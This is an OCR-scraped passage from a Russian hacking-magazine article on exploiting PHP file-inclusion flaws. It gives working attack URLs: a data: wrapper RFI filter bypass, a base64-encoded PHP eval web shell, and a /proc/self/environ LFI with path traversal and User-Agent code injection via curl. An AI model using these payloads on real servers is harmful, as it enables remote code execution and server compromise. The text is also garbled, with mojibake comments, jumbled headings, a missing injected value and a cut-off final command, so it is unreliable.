НЕСЛУЧАЙНО CUDA ИДЕМ? phpMyAdmin - Xakep Online

взлом
ЭТО И ЕСТЬ PHPINFO() ЧЕРЕЗ ПРОТОКОЛ DATA
ВЫВОД /PROC/SELF/FD
ОРИГИНАЛЬНОЕ ADVISORY PHP
FILEPATH TRUNCATION
МЫЛО, ОТПРАВЛЕННОЕ ТЕКУЩЕМУ ПОЛЬЗОВАТЕЛЮ HTTPD
//ñòàíäàðòíûé ôàéë èíêëóäà äëÿ ëþáîé
äèðåêòîðèè
$dir .= '/pages/default.php';
//ñîáñòâåííî, èíêëóä
include($dir . '/pages/default.
php');
?>
Кажется, что в этой ситуации не прокатит никакой
удаленный инклуд. Ведь, кроме того, что
режутся стандартные "http://", "ftp://", под нож
фильтра попадают еще и точка со слешем!
А теперь посмотри внимательно на следующий
эксплойт для нашей RFI и красивого обхода
фильтра, мешающего добросовестному хакеру
(как и при любом другом удаленном инклуде,
директива PHP — allow_url_include, естественно,
должна находиться в положении On):
http://localhost/index.
php?dir=data:,&cmd=phpinfo();
Этот код вполне успешно покажет тебе вывод
функции phpinfo()! Но что делать, когда
фильтрация становится еще более жесткой и
принимает примерно следующий вид?
XÀÊÅÐ 07 /127/ 09
Ты снова можешь подумать, что здесь невозможно
выполнить произвольный php-код
(даже по приведенному выше сценарию), так
как фильтром режутся практически все символы,
используемые в нашем evil-коде. Но не
тут-то было. Уже полюбившийся тебе протокол
«data» поддерживает такую полезную вещь,
как base64 (кстати, если фильтруются и символы
«+», «=», наверняка, ты сможешь подобрать
base64-значение своего шелла без них).
http://localhost/index.php?dir=dat
a:;base64,PD9waHAgZXZhbCgkX1JFUVVF
U1RbY21kXSk7ID8+&cmd=phpinfo();
("+" çàìåíèòü íà url-êîäèðîâàííîå
"%2b")
И вновь на экране phpinfo()!
Но нельзя останавливаться на одном лишь
RFI. Приготовься к самому вкусному.
УСЛУЖЛИВЫЙ
/PROC/SELF/ENVIRON
Представь, что на определенном сайте (http://
site.com) присутствует следующий php-код:
Затем вообрази, что возможности залить
файл/картинку с шеллом у нас нет, пути к логам
апача мы не нашли, а в /tmp не сохраняются
данные сессий. Соседних сайтов также нет.
Что делать?
Неискушенный в LFI хакер опустил бы руки.
Мы не из таких, ибо на помощь спешит хранилище
переменных окружения /proc/self/
environ! Итак, когда мы запрашиваем любую
php-страничку на сервере, создается новый
процесс. В *nix-системах каждый процесс
имеет свою собственную запись в /proc, а /
proc/self, в свою очередь, — это статический
путь и символическая ссылка, содержащая
полезную информацию для последних процессов.
Если мы инжектнем наш evil-код в /proc/self/
environ, то сможем запускать произвольные
команды с помощью LFI :). Заманчиво? А
теперь, собственно, вопрос: каким образом
можно вставить свое значение с evil-кодом в /
proc/self/environ?
Очень просто! Тем же способом, каким ты
инжектишь свой код в логи апача, можно проинжектить
код и в /proc/self/environ.
Для примера возьмем наш любимый и легко
подменяемый юзерагент. По дефолту часть /
proc/self/environ, показывающая useragent,
выглядит примерно так:
PATH=/sbin:/usr/sbin:/bin:/usr/
bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.9.0.4)
Gecko/2008102920 Firefox/3.0.4
HTTP_KEEP_ALIVE=150
...
А теперь меняем юзерагент на и обращаемся к нашему уязвимому
скрипту следующим образом:
curl "http://site.com/index.php?p
age=../../../../../../../../proc/
self/environ&cmd=phpinfo();" -H
061